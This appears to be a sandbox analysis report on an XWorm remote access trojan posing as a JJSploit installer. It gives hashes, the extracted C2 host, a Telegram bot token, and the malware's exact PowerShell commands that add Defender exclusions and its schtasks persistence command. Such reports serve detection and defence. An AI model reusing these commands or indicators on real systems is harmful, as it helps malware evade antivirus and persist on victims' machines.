xworm | cc329ae0aa9e11a9028302a83fe21c41648f28f05c55bb97f22b5f4b2af32ec2

General

Target

JJSploit_8.10.7_x64-setup.exe
Size

19.0MB
MD5

ab53c5d1bdcf304124561fbc7f3a7915
SHA1

92ae497974a20f77127e536686952235ad4b9ffc
SHA256

cc329ae0aa9e11a9028302a83fe21c41648f28f05c55bb97f22b5f4b2af32ec2
SHA512

6fd6049dd91775bdec19a6b867d1d32d421b710ece922af22adea054bd454e6263e23e8884c3f1f1024d74f49e1e351882d605292932a4f382c85a664304b35a
SSDEEP

196608:3rwl+2o/3hfvtz0rjEzDZPb7sF87ERxgcyAtANSP7+bjMUURHvunEywSRCT8H:K+BvqrjE/R3g8YRxNtANI7+bm0E7SZH

Score

10^/10

xworm discovery execution persistence rat trojan upx

Malware Config

Extracted

Family

xworm

Version

5.0

C2

review-tub.gl.at.ply.gg:35036

Mutex

hl5BkPGyS9Yy5EMg

Attributes

Install_directory
%AppData%
install_file
msedgewebview2.exe
telegram
https://api.telegram.org/bot7247711860:AAEZVVyI8BKIccD8HUVaVUhc-jqat0-9cAY/sendMessage?chat_id=7163197258

aes.plain

Signatures

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe	family_xworm
behavioral1/memory/2744-37-0x0000000000880000-0x0000000000894000-memory.dmp	family_xworm
behavioral1/memory/1592-92-0x0000000001230000-0x0000000001244000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

752 powershell.exe
1652 powershell.exe
2636 powershell.exe
1792 powershell.exe

pid	process
752	powershell.exe
1652	powershell.exe
2636	powershell.exe
1792	powershell.exe

Drops startup file 2 IoCs

Processes:

Microsoft Edge WebView2.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedgewebview2.lnk	Microsoft Edge WebView2.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedgewebview2.lnk	Microsoft Edge WebView2.exe

Executes dropped EXE 7 IoCs

Processes:

Loader.exeMicrosoft Edge WebView2.exeLoader.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exe

pid process

2320 Loader.exe
2744 Microsoft Edge WebView2.exe
2812 Loader.exe
1212
1592 msedgewebview2.exe
2016 msedgewebview2.exe
2280 msedgewebview2.exe
Loads dropped DLL 4 IoCs

Processes:

JJSploit_8.10.7_x64-setup.exeLoader.exeLoader.exe

pid process

2356 JJSploit_8.10.7_x64-setup.exe
2356 JJSploit_8.10.7_x64-setup.exe
2320 Loader.exe
2812 Loader.exe

pid	process
2320	Loader.exe
2744	Microsoft Edge WebView2.exe
2812	Loader.exe
1212
1592	msedgewebview2.exe
2016	msedgewebview2.exe
2280	msedgewebview2.exe

pid	process
2356	JJSploit_8.10.7_x64-setup.exe
2356	JJSploit_8.10.7_x64-setup.exe
2320	Loader.exe
2812	Loader.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

Microsoft Edge WebView2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\msedgewebview2 = "C:\\Users\\Admin\\AppData\\Roaming\\msedgewebview2.exe"	Microsoft Edge WebView2.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

4 ip-api.com

flow	ioc
4	ip-api.com

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI23202\python311.dll	upx
behavioral1/memory/2812-40-0x000007FEF3270000-0x000007FEF3859000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

JJSploit_8.10.7_x64-setup.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JJSploit_8.10.7_x64-setup.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2548 schtasks.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeMicrosoft Edge WebView2.exe

pid process

2636 powershell.exe
1792 powershell.exe
752 powershell.exe
1652 powershell.exe
2744 Microsoft Edge WebView2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JJSploit_8.10.7_x64-setup.exe

pid	process
2548	schtasks.exe

pid	process
2636	powershell.exe
1792	powershell.exe
752	powershell.exe
1652	powershell.exe
2744	Microsoft Edge WebView2.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

Microsoft Edge WebView2.exepowershell.exepowershell.exepowershell.exepowershell.exemsedgewebview2.exemsedgewebview2.exemsedgewebview2.exe

description	pid	process
Token: SeDebugPrivilege	2744	Microsoft Edge WebView2.exe
Token: SeDebugPrivilege	2636	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	752	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2744	Microsoft Edge WebView2.exe
Token: SeDebugPrivilege	1592	msedgewebview2.exe
Token: SeDebugPrivilege	2016	msedgewebview2.exe
Token: SeDebugPrivilege	2280	msedgewebview2.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Microsoft Edge WebView2.exe

pid process

2744 Microsoft Edge WebView2.exe

pid	process
2744	Microsoft Edge WebView2.exe

Suspicious use of WriteProcessMemory 35 IoCs

Processes:

JJSploit_8.10.7_x64-setup.exeLoader.exeMicrosoft Edge WebView2.exetaskeng.exe

description	pid	process	target process
PID 2356 wrote to memory of 2320	2356	JJSploit_8.10.7_x64-setup.exe	Loader.exe
PID 2356 wrote to memory of 2320	2356	JJSploit_8.10.7_x64-setup.exe	Loader.exe
PID 2356 wrote to memory of 2320	2356	JJSploit_8.10.7_x64-setup.exe	Loader.exe
PID 2356 wrote to memory of 2320	2356	JJSploit_8.10.7_x64-setup.exe	Loader.exe
PID 2356 wrote to memory of 2744	2356	JJSploit_8.10.7_x64-setup.exe	Microsoft Edge WebView2.exe
PID 2356 wrote to memory of 2744	2356	JJSploit_8.10.7_x64-setup.exe	Microsoft Edge WebView2.exe
PID 2356 wrote to memory of 2744	2356	JJSploit_8.10.7_x64-setup.exe	Microsoft Edge WebView2.exe
PID 2356 wrote to memory of 2744	2356	JJSploit_8.10.7_x64-setup.exe	Microsoft Edge WebView2.exe
PID 2320 wrote to memory of 2812	2320	Loader.exe	Loader.exe
PID 2320 wrote to memory of 2812	2320	Loader.exe	Loader.exe
PID 2320 wrote to memory of 2812	2320	Loader.exe	Loader.exe
PID 2744 wrote to memory of 2636	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 2636	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 2636	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1792	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1792	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1792	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 752	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 752	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 752	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1652	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1652	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 1652	2744	Microsoft Edge WebView2.exe	powershell.exe
PID 2744 wrote to memory of 2548	2744	Microsoft Edge WebView2.exe	schtasks.exe
PID 2744 wrote to memory of 2548	2744	Microsoft Edge WebView2.exe	schtasks.exe
PID 2744 wrote to memory of 2548	2744	Microsoft Edge WebView2.exe	schtasks.exe
PID 1796 wrote to memory of 1592	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 1592	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 1592	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2016	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2016	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2016	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2280	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2280	1796	taskeng.exe	msedgewebview2.exe
PID 1796 wrote to memory of 2280	1796	taskeng.exe	msedgewebview2.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.7_x64-setup.exe
"C:\Users\Admin\AppData\Local\Temp\JJSploit_8.10.7_x64-setup.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2356
- C:\Users\Admin\AppData\Local\Temp\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2320
- - C:\Users\Admin\AppData\Local\Temp\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2812
- C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe
  "C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2636
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Microsoft Edge WebView2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1792
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedgewebview2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedgewebview2.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1652
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedgewebview2" /tr "C:\Users\Admin\AppData\Roaming\msedgewebview2.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2548

C:\Windows\system32\taskeng.exe
taskeng.exe {1203132C-7DEC-4D80-B617-8D9FF1C6977C} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  C:\Users\Admin\AppData\Roaming\msedgewebview2.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2280

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Scheduled Task/Job

1

T1053

Scheduled Task

1

T1053.005

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Microsoft Edge WebView2.exe

Filesize
65KB

MD5
4f361c837acb296ee6dda2c9528ece7a

SHA1
044a151c432f28bb42ea2f375f8a7648c50ba96f

SHA256
b8977b03d3158a58a8299e3c1c6148bf21b767a26259936832bbc7d3fe0f265e

SHA512
9bac2cd1d5033dfbf094410c36691c94b0bef7ecc3e740cfa2e44ea3023a33f162b90f5fb858018a485ee541108625edd0ba8f4e7859b20549c4191627363978

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI23202\python311.dll

Filesize
1.6MB

MD5
9e985651962ccbccdf5220f6617b444f

SHA1
9238853fe1cff8a49c2c801644d6aa57ed1fe4d2

SHA256
3373ee171db8898c83711ec5067895426421c44f1be29af96efe00c48555472e

SHA512
8b8e68bbe71dcd928dbe380fe1a839538e7b8747733ba2fd3d421ba8d280a11ba111b7e8322c14214d5986af9c52ab0c75288bbb2a8b55612fb45836c56ddc36

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
622b31967d9f35102bff193d7681a7e5

SHA1
491bb860b5e34a2859e9de82cecee4db056c371f

SHA256
e5607b1b6dc035b9a982b16531c17e32719a63e749ebec2efd7b72ea7b0cea86

SHA512
1dc0fef836b4a43d8e11627d9c13ec20087b57b84dfaa01909cb34de6f1a64a0789b9a59452eacc6648742a09ef0b023323faf2b12a220be925cec0dd5c81ed3

Download Submit
\Users\Admin\AppData\Local\Temp\Loader.exe

Filesize
6.9MB

MD5
2522b80294787ada26e108125a3c90ca

SHA1
75b1b1aec84a802cddbea81224e853ab9b394f6b

SHA256
49ea5eb89592cc0f4a4291c3bad5281b3cc1f8a944086c2e9df6197ca48dc9e2

SHA512
f1e15e312292357b5f73e4d180a6c143d41aadc56607bb582a21ebc03ad78814ae6a850feb6a327a65ee1312e1efd45de740b2da30cdc6e1d9bf6b48270733e1

Download Submit
memory/1592-92-0x0000000001230000-0x0000000001244000-memory.dmp

Filesize
80KB

Download
memory/1792-53-0x000000001B640000-0x000000001B922000-memory.dmp

Filesize
2.9MB

Download
memory/1792-54-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/2356-0-0x0000000000400000-0x0000000001700000-memory.dmp

Filesize
19.0MB

Download
memory/2636-46-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2636-47-0x00000000027A0000-0x00000000027A8000-memory.dmp

Filesize
32KB

Download
memory/2744-37-0x0000000000880000-0x0000000000894000-memory.dmp

Filesize
80KB

Download
memory/2812-40-0x000007FEF3270000-0x000007FEF3859000-memory.dmp

Filesize
5.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads